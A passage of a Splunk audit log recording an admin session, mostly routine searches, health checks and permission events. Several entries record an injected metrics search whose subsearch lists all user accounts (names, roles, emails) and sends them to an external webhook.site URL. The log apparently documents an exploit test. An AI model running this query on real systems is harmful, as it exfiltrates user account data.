search_id='ta_1665079112.14', search='typeahead prefix="inde" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 17:58:32.264, user=admin, action=search, info=granted , search_id='ta_1665079112.13', search='typeahead prefix="i" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 17:58:31.862, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:31.862, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:31.861, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665079109.12] Audit:[timestamp=10-06-2022 17:58:31.200, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:31.200, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:31.199, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665079109.12] Audit:[timestamp=10-06-2022 17:58:30.699, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:30.699, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:30.698, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665079109.12] Audit:[timestamp=10-06-2022 17:58:30.463, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 17:58:30.456, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 17:58:30.450, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 17:58:30.293, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:30.293, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:30.292, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665079109.12] Audit:[timestamp=10-06-2022 17:58:30.143, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:30.143, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:30.142, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665079109.12] Audit:[timestamp=10-06-2022 17:58:29.874, user=admin, action=rtsearch, info=granted REST: /streams/rtsearch/0] Audit:[timestamp=10-06-2022 17:58:29.819, user=admin, action=search, info=granted , search_id='rt_md_1665079109.12', search='| metadata type=sourcetypes | search totalCount > 0', autojoin='1', buckets=300, ttl=600, max_count=100000, maxtime=0, enable_lookups='1', extra_fields='*', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="UI:Search", mode="RT"] Audit:[timestamp=10-06-2022 17:58:29.819, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 17:58:29.803, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:58:29.743, user=admin, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:58:29.666, user=admin, action=list_health, info=granted object="deployment" operation=list] Audit:[timestamp=10-06-2022 17:58:29.655, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 17:58:29.596, user=admin, action=rest_properties_get, info=granted REST: /static/appLogo_2x.png] Audit:[timestamp=10-06-2022 17:58:29.519, user=admin, action=edit_telemetry_settings, info=granted object="general" operation=list] Audit:[timestamp=10-06-2022 17:58:29.372, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.158, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.158, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.158, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.158, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.157, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.157, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.157, user=admin, action=edit_telemetry_settings, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.157, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=list_workload_rules, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_tokens_all, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_sourcetypes, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=change_authentication, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=license_edit, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=license_edit, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=list_health, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_health, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_global_banner, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_search_server, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_dist_peer, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_deployment_client, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=list_deployment_client, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=fsh_manage, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_search_server, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_dist_peer, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_monitor, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_udp, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_tcp, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_splunktcp, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_scripted, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_monitor, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_token_http, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=restart_splunkd, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.156, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.155, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.155, user=admin, action=change_authentication, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.155, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.155, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.155, user=admin, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:58:29.155, user=admin, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:58:29.155, user=admin, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:58:29.155, user=admin, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:58:29.155, user=admin, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:58:29.155, user=admin, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:58:29.155, user=admin, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:58:29.155, user=admin, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:58:29.155, user=admin, action=edit_tcp_stream, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.155, user=admin, action=edit_upload_and_index, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.155, user=admin, action=edit_tcp_stream, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.155, user=admin, action=edit_upload_and_index, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.155, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.153, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.153, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.153, user=admin, action=rest_apps_view, info=granted ] Audit:[timestamp=10-06-2022 17:58:29.149, user=admin, action=edit_user, info=granted object="admin" operation=edit] Audit:[timestamp=10-06-2022 17:58:29.149, user=admin, action=edit_user, info=granted object="admin" operation=list] Audit:[timestamp=10-06-2022 17:58:28.388, user=admin, action=search, info=granted REST: /search/timeparser/tz] Audit:[timestamp=10-06-2022 17:58:24.621, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:58:14.624, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:58:08.314, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:57:09.895, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:56:19.495, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:55:14.647, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:55:04.769, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:54:54.968, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:54:44.965, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:54:34.641, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:54:24.962, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:54:14.968, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:54:10.493, user=n/a, action=update,path="/opt/splunk/etc/users/user/search/history/so1.csv", isdir=0, size=1578, gid=41812, uid=41812, modtime="Thu Oct 6 17:48:36 2022", mode="rw-------", hash=, chgs="modtime "] Audit:[timestamp=10-06-2022 17:54:10.486, user=n/a, action=update,path="/opt/splunk/etc/users/user/search/metadata/local.meta", isdir=0, size=208, gid=41812, uid=41812, modtime="Thu Oct 6 17:48:17 2022", mode="rw-------", hash=, chgs="modtime "] Audit:[timestamp=10-06-2022 17:54:10.482, user=n/a, action=update,path="/opt/splunk/etc/users/user/search/local/ui-prefs.conf", isdir=0, size=44, gid=41812, uid=41812, modtime="Thu Oct 6 17:48:17 2022", mode="rw-------", hash=, chgs="modtime "] Audit:[timestamp=10-06-2022 17:54:10.479, user=n/a, action=update,path="/opt/splunk/etc/users/user/search/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:48:17 2022", mode="rwx------", hash=, chgs="modtime "] Audit:[timestamp=10-06-2022 17:54:10.474, user=n/a, action=update,path="/opt/splunk/etc/users/user/search/local", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:48:17 2022", mode="rwx------", hash=, chgs="modtime "] Audit:[timestamp=10-06-2022 17:54:10.471, user=n/a, action=update,path="/opt/splunk/etc/users/user/search/history", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:48:36 2022", mode="rwx------", hash=, chgs="modtime "] Audit:[timestamp=10-06-2022 17:54:10.366, user=n/a, action=add,path="/opt/splunk/etc/users/admin/search/history/so1.csv", isdir=0, size=2122, gid=41812, uid=41812, modtime="Thu Oct 6 17:51:36 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:54:10.362, user=n/a, action=add,path="/opt/splunk/etc/users/admin/search/history/.dummy_history", isdir=0, size=0, gid=41812, uid=41812, modtime="Thu Oct 6 17:44:36 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:54:10.358, user=n/a, action=add,path="/opt/splunk/etc/users/admin/search/metadata/local.meta", isdir=0, size=142, gid=41812, uid=41812, modtime="Thu Oct 6 17:49:28 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:54:10.354, user=n/a, action=add,path="/opt/splunk/etc/users/admin/search/local/ui-tour.conf", isdir=0, size=25, gid=41812, uid=41812, modtime="Thu Oct 6 17:49:28 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:54:10.350, user=n/a, action=add,path="/opt/splunk/etc/users/admin/search/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:49:28 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:54:10.346, user=n/a, action=add,path="/opt/splunk/etc/users/admin/search/local", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:49:28 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:54:10.342, user=n/a, action=add,path="/opt/splunk/etc/users/admin/search/history", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:51:36 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:54:10.338, user=n/a, action=update,path="/opt/splunk/etc/users/admin/user-prefs/metadata/local.meta", isdir=0, size=68, gid=41812, uid=41812, modtime="Thu Oct 6 17:49:22 2022", mode="rw-------", hash=, chgs="modtime "] Audit:[timestamp=10-06-2022 17:54:10.234, user=n/a, action=update,path="/opt/splunk/etc/users/admin/user-prefs/local/user-prefs.conf", isdir=0, size=227, gid=41812, uid=41812, modtime="Thu Oct 6 17:49:22 2022", mode="rw-------", hash=, chgs="modtime "] Audit:[timestamp=10-06-2022 17:54:10.230, user=n/a, action=update,path="/opt/splunk/etc/users/admin/user-prefs/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:49:22 2022", mode="rwx------", hash=, chgs="modtime "] Audit:[timestamp=10-06-2022 17:54:10.225, user=n/a, action=update,path="/opt/splunk/etc/users/admin/user-prefs/local", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:49:22 2022", mode="rwx------", hash=, chgs="modtime "] Audit:[timestamp=10-06-2022 17:54:10.221, user=n/a, action=add,path="/opt/splunk/etc/users/admin/search", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:49:28 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:54:10.116, user=n/a, action=update,path="/opt/splunk/etc/users/admin", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:44:36 2022", mode="rwx------", hash=, chgs="modtime "] Audit:[timestamp=10-06-2022 17:54:04.968, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:53:55.008, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:53:44.963, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:53:34.637, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:53:24.971, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:53:15.127, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:53:10.615, user=n/a, action=update,path="/opt/splunk/etc/login-info.cfg", isdir=0, size=290, gid=41812, uid=41812, modtime="Thu Oct 6 17:49:20 2022", mode="rw-------", hash=, chgs="modtime "] Audit:[timestamp=10-06-2022 17:53:05.126, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:52:54.985, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:52:44.964, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:52:34.975, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:52:24.965, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:52:14.969, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:52:04.963, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:51:54.980, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:51:44.960, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:51:36.304, user=admin, action=search, info=canceled, search_id='1665078605.11', has_error_warn=false, fully_completed_search=true, total_run_time=1.39, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665078605, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=1664989200.000000000, search_lt=1665078603.664000000, is_realtime=0, savedsearch_name="", search_startup_time="1395", is_prjob=false, app="search", provenance="N/A", mode="historical_batch", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='| mstats avg("fake") prestats=true WHERE "index"=eee [| rest /services/authentication/users | table realname, title, roles, email | sendalert webhook param.url=https://webhook.site/62ffc09d-d887-4d9b-8c9a-74ccb1b4d15b] "demo"="qwe" earliest=1664989200 latest=1665078603.664 span=5m | timechart avg("fake") AS "0 / 27cfd3a6-562a-4089-af3e-0f9259eb1c18 / SERIES / Avg" span=5m | fields - _span*'] Audit:[timestamp=10-06-2022 17:51:34.873, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:51:24.969, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:51:14.981, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:51:06.305, user=admin, action=search, info=canceled, search_id='1665078604.10', has_error_warn=false, fully_completed_search=true, total_run_time=0.07, event_count=510, result_count=265, available_count=0, scan_count=510, drop_count=0, exec_time=1665078604, api_et=1665077704.000000000, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=1665077704.000000000, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="93", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_18fb2bf180021f33", app="search", provenance="N/A", mode="historical_batch", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='| mcatalog values(metric_name) as metrics WHERE NOT metric_name="*_mrollup_*" AND ("index"="*" OR "index"="_*" ) | mvexpand metrics limit=20000'] Audit:[timestamp=10-06-2022 17:51:06.304, user=admin, action=search, info=canceled, search_id='1665078604.9', has_error_warn=false, fully_completed_search=true, total_run_time=0.06, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665078604, api_et=1664989200.000000000, api_lt=1665078603.664000000, api_index_et=N/A, api_index_lt=N/A, search_et=1664989200.000000000, search_lt=1665078603.664000000, is_realtime=0, savedsearch_name="", search_startup_time="94", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_36d8032b2eb50d0a", app="search", provenance="N/A", mode="historical_batch", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='| mcatalog values(metric_name) WHERE metric_name="fake" AND ("index"="*" OR "index"="_*") AND NOT metric_name="*_mrollup_*" BY index | fields index'] Audit:[timestamp=10-06-2022 17:51:04.971, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:50:54.969, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:50:44.969, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:50:36.305, user=admin, action=search, info=bad_request, search_id='rt_md_1665078565.8', has_error_warn=true, fully_completed_search=true, total_run_time=66.03, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665078566, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=1, savedsearch_name="", search_startup_time="51", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_d79d8decd779a2d3", app="search", provenance="UI:Search", mode="RT", is_proxied=false, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='| metadata type=sourcetypes | search totalCount > 0'] Audit:[timestamp=10-06-2022 17:50:36.304, user=admin, action=search, info=completed, search_id='subsearch_1665078605.11_1665078605.2', has_error_warn=false, fully_completed_search=true, total_run_time=1.37, event_count=0, result_count=2, available_count=0, scan_count=0, drop_count=0, exec_time=1665078605, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="7", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_15aa216ceeb84734", app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='| rest /services/authentication/users | table realname, title, roles, email | sendalert webhook param.url=https://webhook.site/62ffc09d-d887-4d9b-8c9a-74ccb1b4d15b'] Audit:[timestamp=10-06-2022 17:50:34.694, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:50:24.667, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:50:14.612, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:50:07.576, user=admin, action=search, info=cancel, search_id='1665078605.11'] Audit:[timestamp=10-06-2022 17:50:07.575, user=admin, action=search, info=granted REST: /search/jobs/1665078605.11/control] Audit:[timestamp=10-06-2022 17:50:07.421, user=admin, action=search, info=granted REST: /search/jobs/1665078605.11/results] Audit:[timestamp=10-06-2022 17:50:07.285, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:50:07.285, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:50:07.284, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 17:50:06.291, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:50:06.291, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:50:06.290, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 17:50:05.279, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:50:05.279, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:50:05.278, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 17:50:05.050, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:50:05.026, user=admin, action=quota,search_id=1665078605.11, elapsed_ms=2, cache_size=2] Audit:[timestamp=10-06-2022 17:50:05.025, user=admin, action=search, info=granted , search_id='1665078605.11', search='| mstats avg("fake") prestats=true WHERE "index"=eee [| rest /services/authentication/users | table realname, title, roles, email | sendalert webhook param.url=https://webhook.site/62ffc09d-d887-4d9b-8c9a-74ccb1b4d15b] "demo"="qwe" earliest=1664989200 latest=1665078603.664 span=5m | timechart avg("fake") AS "0 / 27cfd3a6-562a-4089-af3e-0f9259eb1c18 / SERIES / Avg" span=5m | fields - _span*', autojoin='1', buckets=0, ttl=600, max_count=500000, maxtime=8640000, enable_lookups='1', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', 